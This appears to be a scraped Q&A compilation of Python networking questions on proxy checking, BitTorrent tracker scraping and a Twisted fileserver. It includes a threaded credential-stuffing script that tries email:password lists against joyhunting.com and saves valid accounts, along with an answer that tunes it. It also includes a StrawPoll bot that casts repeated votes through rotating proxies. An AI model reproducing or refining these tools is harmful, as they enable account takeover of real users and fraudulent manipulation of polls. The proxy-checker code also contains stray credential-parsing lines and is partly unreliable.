text file processing with python - python

i have some text file which contain proxy ip .
which look like following
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
after processing check this proxy , then i want to marked as following
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
how can be done with python? or some sample
if anyone would help me or enlight me much aprreciate!
i was edited
this is script source of what i have
finally check finished proxy list are saved to 'proxy_alive.txt'
in this file i want to mark whether proxy element alive or not.
import socket
import urllib2
import threading
import sys
import Queue
import socket
socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout"%(socket.getdefaulttimeout())
#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com" # Don't put http:// in here, or any /'s
check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20
def writer(f,rq):
while True:
line = rq.get()
f.write(line+'\n')
def checker(q,oq):
while True:
proxy_info = q.get() #ip:port
if proxy_info == None:
print "Finished"
#quit()
return
#print "Checking %s"%proxy_info
if proxy_type == 'http':
try:
listhandle = open("proxylist.txt").read().split('\n')
for line in listhandle:
saveAlive = open("proxy_alive.txt", 'a')
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
oq.put(proxy_info)
print '[+] alive proxy' , proxy_info
saveAlive.write(line)
saveAlive.close()
except urllib2.HTTPError,e:
print 'url open error? slow?'
pass
except Exception,detail:
print '[-] bad proxy' ,proxy_info
else:
# gotta be socks
try:
s = socks.socksocket()
if proxy_type == "s4":
t = socks.PROXY_TYPE_SOCKS4
else:
t = socks.PROXY_TYPE_SOCKS5
ip,port = proxy_info.split(':')
s.setproxy(t,ip,int(port))
s.connect((url,80))
oq.put(proxy_info)
print proxy_info
except Exception,error:
print proxy_info
threading.Thread(target=writer,args=(open(output_file,"wb"),output_queue)).start()
for i in xrange(threads):
threading.Thread(target=checker,args=(check_queue,output_queue)).start()
for line in open(input_file).readlines():
check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)

You can use a queue to queue all the list of address and their meta information.
After you are done with your operation on this ip addresses, you can write it back to the same file with 'w' mode.
[ ( ip-address-1,'x' ), ( ip-address-2, '0'), ...... ]

Related

Python Proxy Request Failed Connection

Im trying to make a Strawpoll Bot. I found something on Git Hub and took it, but its not able to connect to a proxy server. Either i get a timeout or it says "Couldn´t connect to proxy". I took https proxy´s from a free list.
Its not my code its frome here
My python skills are very limited
I hope someon can help me
This is the code or download to hole zip here
#!/usr/bin/env python
try:
from xml.dom import minidom
import xml.etree.cElementTree as ET
from optparse import OptionParser
import sys
import os
except ImportError as msg:
print("[-] Library not installed: " + str(msg))
exit()
try:
import requests except ImportError:
print("[-] Missing library 'requests'")
print("[*] Please install missing library with: pip install requests")
# Creator: Luis Hebendanz
class Main:
# SETTINGS
maxVotes = 1
voteFor = ""
surveyId = ""
# GLOBAL VARIABLES
proxyListFile = "D:\Feko Karels\Documents\Informatik Kram\Python\strawpoll-voting-bot-master\https-proxy-list.xml"
saveStateFile = "saveState.xml"
proxyTimeout = 10 # Seconds
currentProxyPointer = 0
successfulVotes = 0
def __init__(self):
try:
###
# Command line argument parser
###
parser = OptionParser()
parser.add_option("-v", "--votes", action="store", type="string", dest="votes",help="number of votes to give")
parser.add_option("-s", "--survey", action="store", type="string", dest="survey",help="id of the survey")
parser.add_option("-t", "--target", action="store", type="string", dest="target", help="checkbox to vote for")
parser.add_option("-f", "--flush", action="store_true", dest="flush",help="Deletes skipping proxy list")
(options, args) = parser.parse_args()
if len(sys.argv) > 2:
if options.votes is None:
print("[-] Number of votes not defined with: -v ")
exit(1)
if options.survey is None:
print("[-] Survey id not defined with: -s")
exit(1)
if options.target is None:
print("[-] Target to vote for is not defined with: -t")
exit(1)
try:
self.maxVotes = int(options.votes)
except ValueError:
print("[-] Please define an integer for -v")
# Save arguments into global variable
self.voteFor = options.target
self.surveyId = options.survey
# Flush saveState.xml
if options.flush == True:
print("[*] Flushing saveState.xml file...")
os.remove(self.saveStateFile)
# Print help
else:
print("[-] Not enough arguments given")
print()
parser.print_help()
exit()
# Read proxy list file
alreadyUsedProxy = False
xmldoc = minidom.parse(self.proxyListFile)
taglist = xmldoc.getElementsByTagName('para')
tagList2 = None
# Check if saveState.xml exists and read file
if os.path.isfile(self.saveStateFile):
xlmSave = minidom.parse(self.saveStateFile)
tagList2 = xlmSave.getElementsByTagName("usedProxy")
# Print remaining proxies
if tagList2 is not None:
print("[*] Number of remaining proxies in list: " + str(len(taglist) - len(tagList2)))
print()
else:
print("[*] Number of proxies in new list: " + str(len(taglist)))
print()
# Go through proxy list
for tag in taglist:
# Check if max votes has been reached
if self.successfulVotes >= self.maxVotes:
break
# Increase number of used proxy integer
self.currentProxyPointer += 1
# Read value out of proxy list
tagValue = tag.childNodes[0].nodeValue
# Read in saveState.xml if this proxy has already been used
if tagList2 is not None:
for tag2 in tagList2:
if tagValue == tag2.childNodes[0].nodeValue:
alreadyUsedProxy = True
break
# If it has been used print message and continue to next proxy
if alreadyUsedProxy == True:
print("["+ str(self.currentProxyPointer) +"] Skipping proxy: " + tagValue)
alreadyUsedProxy = False
continue
# Print current proxy information
print("["+ str(self.currentProxyPointer) +"] New proxy: " + tagValue)
print("[*] Connecting... ")
# Connect to strawpoll and send vote
self.sendToWebApi('https://' + tagValue)
# Write used proxy into saveState.xml
self.writeUsedProxy(tagValue)
print()
# Check if max votes has been reached
if self.successfulVotes >= self.maxVotes:
print("[+] Finished voting: " + str(self.successfulVotes))
else:
print("[+] Finished every proxy!")
exit()
except IOError as ex:
print("[-] " + ex.strerror + ": " + ex.filename)
except KeyboardInterrupt as ex:
print("[*] Saving last proxy...")
print("[*] Programm aborted")
exit()
def getClientIp(self, httpProxy):
proxyDictionary = {"https": httpProxy}
rsp = requests.get("https://api.ipify.org/", proxies=proxyDictionary)
return str(rsp.text)
def writeUsedProxy(self, proxyIp):
if os.path.isfile(self.saveStateFile):
# Read file
tree = ET.parse(self.saveStateFile)
# Get <root> tag
root = tree.getroot()
child = ET.Element("usedProxy")
child.text = str(proxyIp)
root.append(child)
# Write to file
tree.write(self.saveStateFile, encoding="UTF-8")
else:
# Create <root> tag
root = ET.Element("article")
# Get element tree
tree = ET.ElementTree(root)
# Write to file
tree.write(self.saveStateFile, encoding="UTF-8")
# Now write defined entry into file
self.writeUsedProxy(proxyIp)
def sendToWebApi(self, httpsProxy):
try:
headers = \
{
'Host': 'strawpoll.de',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Accept': '*/*',
'Accept-Language': 'de,en-US;q=0.7,en; q=0.3',
'Referer': 'https://strawpoll.de/' + self.surveyId,
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '29',
'Cookie': 'lang=de',
'DNT': '1',
'Connection': 'close'
}
payload = {'pid': self.surveyId, 'oids': self.voteFor}
proxyDictionary = {"https": httpsProxy}
# Connect to server
r = requests.post('https://strawpoll.de/vote', data=payload, headers=headers, proxies=proxyDictionary, timeout=self.proxyTimeout) #
json = r.json()
# Check if succeeded
if(bool(json['success'])):
print("[+] Successfully voted.")
self.successfulVotes += 1
return True
else:
print("[-] Voting failed. This Ip already voted.")
return False
except requests.exceptions.Timeout as ex:
print("[-] Timeout")
return False
except requests.exceptions.ConnectionError as ex:
print("[-] Couldn't connect to proxy")
return False
except Exception as ex:
print(str(ex))
return False
# Execute main
Main()

UDP tracker scrape request returns zero for all hashes

I successfuly managed to get connected to tracker. After connection establishes, I request for scraping. Tracker returns a response with right byte order but (Seeder, Leecher, Completed) infos of torrent is always zero which seems silly.
I suspect hash info encoding problem but I couldn't come up with a solution. I use following python code block for scraping.
import os
import bencode
import struct
import socket
import urlparse
import binascii
def loadFile(f_name):
user_home = os.path.expanduser('~')
path = user_home+'/completetorrent/data/'+ f_name
return open(path,'rb')
def getSocket():
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.settimeout(8)
return sock
def getConnection(url):
parsed = urlparse.urlparse(url)
hostname = socket.gethostbyname(parsed.hostname)
port = parsed.port
return (hostname,port)
def main():
f = loadFile('test1.torrent')
decoded = bencode.bdecode(f.read())
#Connect request starts
buff = ''
buff += struct.pack('!q',0x41727101980)
buff += struct.pack('!i',0)
buff += struct.pack('!i',123456789)
sock = getSocket()
conn = getConnection("udp://tracker.coppersurfer.tk:6969/announce")
sock.sendto(buff,conn)
#Connect Response starts
response = sock.recvfrom(4096)[0]
assert len(response) == 16, 'response len must be bigger than 16 but %d' % len(response)
if struct.unpack('!i',response[0:4])[0] != 0:
raise ValueError('Bad response')
struct.unpack('!i',response[4:8]) #ignore transaction id
#Scrape request starts
con_id = struct.unpack('!q',response[8:16])[0]
buff = ''
buff += struct.pack('!q',con_id)
buff += struct.pack('!i',2)
buff += struct.pack('!i',123456)
hash_ = decoded['info']['pieces'][0:20]
buff += struct.pack('!20s',hash_)
sock.sendto(buff,conn)
#Scrape response starts
response = sock.recvfrom(4096)[0]
if struct.unpack('!i',response[0:4])[0] != 2:
raise ValueError('Bad scrape response')
struct.unpack('!i',response[4:8]) #ignore transaction id
seedrs = struct.unpack('!i',response[8:12])
completed = struct.unpack('!i',response[12:16])
leechers = struct.unpack('!i',response[16:20])
print seedrs,completed,leechers
Convert the info_hash to hex value.

Check server status on Twisted

While I was writing simple message-based fileserver and client, I got the idea about checking fileserver status, but don't know how to realize this: just try to connect and disconnect from server (and how disconnect immediately, when server is not running, if using this way?) or maybe twisted/autobahn have some things, which help to get server status without creating "full connection"?
a) fileserver.py
import os
import sys
import json
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol, listenWS
CONFIG_TEMPLATE = ''
CONFIG_DATA = {}
class MessageBasedServerProtocol(WebSocketServerProtocol):
"""
Message-based WebSockets server
Template contains some parts as string:
[USER_ID:OPERATION_NAME:FILE_ID] - 15 symbols for USER_ID,
10 symbols for OPERATION_NAME,
25 symbols for FILE_ID
other - some data
"""
def __init__(self):
path = CONFIG_DATA['path']
base_dir = CONFIG_DATA['base_dir']
# prepare to working with files...
if os.path.exists(path) and os.path.isdir(path):
os.chdir(path)
if not os.path.exists(base_dir) or not os.path.isdir(base_dir):
os.mkdir(base_dir)
os.chdir(base_dir)
else:
os.makedir(path)
os.chdir(path)
os.mkdir(base_dir)
os.chdir(base_dir)
# init some things
self.fullpath = path + '/' + base_dir
def __checkUserCatalog(self, user_id):
# prepare to working with files...
os.chdir(self.fullpath)
if not os.path.exists(user_id) or not os.path.isdir(user_id):
os.mkdir(user_id)
os.chdir(user_id)
else:
os.chdir(self.fullpath + '/' + user_id)
def onOpen(self):
print "[USER] User with %s connected" % (self.transport.getPeer())
def connectionLost(self, reason):
print '[USER] Lost connection from %s' % (self.transport.getPeer())
def onMessage(self, payload, isBinary):
"""
Processing request from user and send response
"""
user_id, cmd, file_id = payload[:54].replace('[', '').replace(']','').split(':')
data = payload[54:]
operation = "UNK" # WRT - Write, REA -> Read, DEL -> Delete, UNK -> Unknown
status = "C" # C -> Complete, E -> Error in operation
commentary = 'Succesfull!'
# write file into user storage
if cmd == 'WRITE_FILE':
self.__checkUserCatalog(user_id)
operation = "WRT"
try:
f = open(file_id, "wb")
f.write(data)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
f.close()
# read some file
elif cmd == 'READU_FILE':
self.__checkUserCatalog(user_id)
operation = "REA"
try:
f = open(file_id, "rb")
commentary = f.read()
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
f.close()
# delete file from storage (and in main server, in parallel delete from DB)
elif cmd == 'DELET_FILE':
self.__checkUserCatalog(user_id)
operation = "DEL"
try:
os.remove(file_id)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
self.sendMessage('[%s][%s]%s' % (operation, status, commentary), isBinary=True)
if __name__ == '__main__':
if len(sys.argv) < 2:
print "using python fileserver_client.py [PATH_TO_config.json_FILE]"
else:
# read config file
CONFIG_TEMPLATE = sys.argv[1]
with open(CONFIG_TEMPLATE, "r") as f:
CONFIG_DATA = json.load(f)
# create server
factory = WebSocketServerFactory("ws://localhost:9000")
factory.protocol = MessageBasedServerProtocol
listenWS(factory)
reactor.run()
b) client.py
import json
import sys
import commands
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketClientFactory, WebSocketClientProtocol, connectWS
CONFIG_TEMPLATE = ''
CONFIG_DATA = {}
class MessageBasedClientProtocol(WebSocketClientProtocol):
"""
Message-based WebSockets client
Template contains some parts as string:
[USER_ID:OPERATION_NAME:FILE_ID] - 15 symbols for USER_ID,
10 symbols for OPERATION_NAME,
25 symbols for FILE_ID
other - some data
"""
def onOpen(self):
user_id = CONFIG_DATA['user']
operation_name = CONFIG_DATA['cmd']
file_id = CONFIG_DATA['file_id']
src_file = CONFIG_DATA['src_file']
data = '[' + str(user_id) + ':' + str(operation_name) + ':' + str(file_id) + ']'
if operation_name == 'WRITE_FILE':
with open(src_file, "r") as f:
info = f.read()
data += str(info)
self.sendMessage(data, isBinary=True)
def onMessage(self, payload, isBinary):
cmd = payload[1:4]
result_cmd = payload[6]
if cmd in ('WRT', 'DEL'):
print payload
elif cmd == 'REA':
if result_cmd == 'C':
try:
data = payload[8:]
f = open(CONFIG_DATA['src_file'], "wb")
f.write(data)
except IOError, e:
print e
except Exception, e:
raise Exception(e)
finally:
print payload[:8] + "Successfully!"
f.close()
else:
print payload
reactor.stop()
if __name__ == '__main__':
if len(sys.argv) < 2:
print "using python fileserver_client.py [PATH_TO_config.json_FILE]"
else:
# read config file
CONFIG_TEMPLATE = sys.argv[1]
with open(CONFIG_TEMPLATE, "r") as f:
CONFIG_DATA = json.load(f)
# connection to server
factory = WebSocketClientFactory("ws://localhost:9000")
factory.protocol = MessageBasedClientProtocol
connectWS(factory)
reactor.run()
Find solution this issue: using callLater or deferLater for disconnect from server, if can't connect, but when all was 'OK', just take server status, which he says.
import sys
from twisted.internet.task import deferLater
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketClientFactory, WebSocketClientProtocol, connectWS
CONFIG_IP = ''
CONFIG_PORT = 9000
def isOffline(status):
print status
class StatusCheckerProtocol(WebSocketClientProtocol):
def __init__(self):
self.operation_name = "STATUS_SRV"
self.user_id = 'u00000000000000'
self.file_id = "000000000000000000000.log"
def onOpen(self):
data = '[' + str(self.user_id) + ':' + str(self.operation_name) + ':' + str(self.file_id) + ']'
self.sendMessage(data, isBinary=True)
def onMessage(self, payload, isBinary):
cmd = payload[1:4]
result_cmd = payload[6]
data = payload[8:]
print data
reactor.stop()
if __name__ == '__main__':
if len(sys.argv) < 3:
print "using python statuschecker.py [IP] [PORT]"
else:
# read preferences
CONFIG_IP = sys.argv[1]
CONFIG_PORT = int(sys.argv[2])
server_addr = "ws://%s:%d" % (CONFIG_IP, CONFIG_PORT)
# connection to server
factory = WebSocketClientFactory(server_addr)
factory.protocol = StatusCheckerProtocol
connectWS(factory)
# create special Deffered, which disconnect us from some server, if can't connect within 3 seconds
d = deferLater(reactor, 3, isOffline, 'OFFLINE')
d.addCallback(lambda ignored: reactor.stop())
# run all system...
reactor.run()

python proxy list check

i have some text file which contain proxy ip .
which look like following
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
after processing check this proxy , then i want to marked as following
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
how can be done with python? or some sample
if anyone would help me or enlight me much aprreciate!
i was edited
this is script source of what i have
finally check finished proxy list are saved to 'proxy_alive.txt'
in this file i want to mark whether proxy element alive or not.
import socket
import urllib2
import threading
import sys
import Queue
import socket
socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout"%(socket.getdefaulttimeout())
#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com" # Don't put http:// in here, or any /'s
check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20
def writer(f,rq):
while True:
line = rq.get()
f.write(line+'\n')
def checker(q,oq):
while True:
proxy_info = q.get() #ip:port
if proxy_info == None:
print "Finished"
#quit()
return
#print "Checking %s"%proxy_info
if proxy_type == 'http':
try:
listhandle = open("proxylist.txt").read().split('\n')
for line in listhandle:
saveAlive = open("proxy_alive.txt", 'a')
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
oq.put(proxy_info)
print '[+] alive proxy' , proxy_info
saveAlive.write(line)
saveAlive.close()
except urllib2.HTTPError,e:
print 'url open error? slow?'
pass
except Exception,detail:
print '[-] bad proxy' ,proxy_info
else:
# gotta be socks
try:
s = socks.socksocket()
if proxy_type == "s4":
t = socks.PROXY_TYPE_SOCKS4
else:
t = socks.PROXY_TYPE_SOCKS5
ip,port = proxy_info.split(':')
s.setproxy(t,ip,int(port))
s.connect((url,80))
oq.put(proxy_info)
print proxy_info
except Exception,error:
print proxy_info
threading.Thread(target=writer,args=(open(output_file,"wb"),output_queue)).start()
for i in xrange(threads):
threading.Thread(target=checker,args=(check_queue,output_queue)).start()
for line in open(input_file).readlines():
check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)
Is this what you want?
#!/usr/bin/env python
import Queue
import threading
import urllib2
import time
input_file = 'proxylist.txt'
threads = 10
queue = Queue.Queue()
output = []
class ThreadUrl(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
#grabs host from queue
proxy_info = self.queue.get()
try:
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
output.append(('0',proxy_info))
else:
raise "Not Google"
except:
output.append(('x',proxy_info))
#signals to queue job is done
self.queue.task_done()
start = time.time()
def main():
#spawn a pool of threads, and pass them queue instance
for i in range(5):
t = ThreadUrl(queue)
t.setDaemon(True)
t.start()
hosts = [host.strip() for host in open(input_file).readlines()]
#populate queue with data
for host in hosts:
queue.put(host)
#wait on the queue until everything has been processed
queue.join()
main()
for proxy,host in output:
print proxy,host
print "Elapsed Time: %s" % (time.time() - start)

python thread queue question

Hell All.
i was made some python script with thread which checking some of account exist in some website
if i run thread 1 , it working well but if increase thread such like 3~5 and above,
result was very different compare with thread 1 and i was checked manually and
if i increase thread result was not correct.
i think some of my thread code have to tune or how about use Queue module ?
anyone can advice or tuneing my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data #정상 로그인
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원"
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for line in listhandle:
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %n.' % (maillist, currline)
exit
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break
Can You please specify what are different results?
From what I see, code is doing much more than verifying account.
From what I see, You're appending to a single file from multiple threads, I'd say it's not thread-safe.
Also, AFAIK Mechanize uses shared cookie storage for all requests, so they are probably interfering. Use separate mechanize.Browser() inside run() instead of mechanize.Request().

Categories

Resources